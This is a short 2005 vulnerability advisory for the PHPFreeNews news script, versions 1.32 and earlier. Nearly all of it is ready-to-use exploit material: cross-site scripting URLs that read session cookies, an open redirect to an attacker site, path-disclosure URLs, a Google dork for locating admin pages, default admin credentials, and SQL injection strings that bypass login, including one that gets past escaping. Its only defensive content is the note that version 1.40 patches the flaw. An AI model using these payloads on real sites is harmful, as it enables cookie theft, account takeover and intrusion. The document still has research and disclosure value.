29/07/2005 8.36.03

PHPFreeNews Version 1.32 (& previous) sql injection/login bypass, cross site scripting, path disclosure, information disclosure 
 

author site: http://www.phpfreenews.co.uk/Main_Intro.php

xss poc:
http://[target]/[path]/inc/Footer.php?ScriptVersion=<script>alert(document.cookie)</script>
http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&NewsDir=")}//--></script><script>alert(document.cookie)</script>
http://[target]/[path]/inc/ScriptFunctions.php?EnableRatings=1&NewsDir=")}//--></script><script>alert(document.cookie)</script>
http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&NewsDir=")}//--></script><script>alert(document.cookie)</script>
http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&PopupWidth=")}//--></script><script>alert(document.cookie)</script>
http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&PopupHeight=")}//--></script><script>alert(document.cookie)</script>
http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&PopupWidth=")}//--></script><script>alert(document.cookie)</script>
http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&PopupHeight=")}//--></script><script>alert(document.cookie)</script>

also a user can craft a url to redirect a victim to an evil site:

http://[target]/[path]/inc/Logout.php?AdminScript=http://[evil_site]/[evil_script]

path disclosure:

http://[target]/[path]/inc/ArchiveOldNews.php
http://[target]/[path]/inc/Categories.php
http://[target]/[path]/inc/CheckLogout.php
http://[target]/[path]/inc/CommentsApproval.php
http://[target]/[path]/inc/Images.php
http://[target]/[path]/inc/NewsList.php
http://[target]/[path]/inc/Password.php
http://[target]/[path]/inc/Post.php
http://[target]/[path]/inc/PostsApproval.php
http://[target]/[path]/inc/PurgeOldNews.php
http://[target]/[path]/inc/SetSticky.php
http://[target]/[path]/inc/SetVisible.php
http://[target]/[path]/inc/Statistics.php
http://[target]/[path]/inc/Template.php
http://[target]/[path]/inc/UserDefinedCodes.php
http://[target]/[path]/inc/Users.php

information disclosure:
googledork:
PHPFreeNews inurl:Admin.php
(with this, you can passively fingerprint the server, PHP & MySQL version are in Google description...
because this info are shownwed with non-chalance in admin.php page ;) )

default password:
login: Admin
pass: Admin

MySQL Injection / Login Bypass in previous versions:
login: Admin
password: ') or isnull(1/0) or ('a'='a

note: all string, not consider 'or'

in 1.32 version LoginUsername and LoginPassword vars are addslashed... but, try this: 

login: whatever
pass: //') or isnull(1/0) /*
 
this is definetely patched in 1.40 version

rgod
email: retrogod at aliceposta.it
site: http://rgod.altervista.org